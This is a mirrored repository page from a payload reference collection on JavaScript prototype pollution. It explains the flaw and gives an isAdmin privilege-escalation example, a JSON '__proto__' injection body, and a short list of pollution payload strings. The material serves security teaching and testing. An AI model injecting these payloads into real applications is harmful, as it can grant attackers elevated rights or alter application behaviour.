mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-11-10 07:04:22 +00:00

History

Swissky d142587f28 Race Condition WIP + AD asreproast/kerberoasting		2023-10-01 12:42:20 +02:00
..
README.md	Race Condition WIP + AD asreproast/kerberoasting	2023-10-01 12:42:20 +02:00

README.md

Prototype Pollution

Prototype pollution is a type of vulnerability that occurs in JavaScript when properties of Object.prototype are modified. This is particularly risky because JavaScript objects are dynamic and we can add properties to them at any time. Also, almost all objects in JavaScript inherit from Object.prototype, making it a potential attack vector.

Tools

yeswehack/pp-finder - Help you find gadget for prototype pollution exploitation

Labs

Exploit

In JavaScript, prototypes are what allow objects to inherit features from other objects. If an attacker is able to add or modify properties of Object.prototype, they can essentially affect all objects that inherit from that prototype, potentially leading to various kinds of security risks.

Examples

Imagine that an application uses an object to maintain configuration settings, like this:
```
let config = {
    isAdmin: false
};
```
An attacker might be able to add an isAdmin property to Object.prototype, like this:
```
Object.prototype.isAdmin = true;
```

Prototype pollution via JSON input

You can access the prototype of any object via the magic property __proto__.

{
    "__proto__": {
        "evilProperty": "evilPayload"
    }
}

Prototype pollution payloads

Object.__proto__["evilProperty"]="evilPayload"
Object.__proto__.evilProperty="evilPayload"
Object.constructor.prototype.evilProperty="evilPayload"
Object.constructor["prototype"]["evilProperty"]="evilPayload"
{"__proto__": {"evilProperty": "evilPayload"}}

README.md Unescape Escape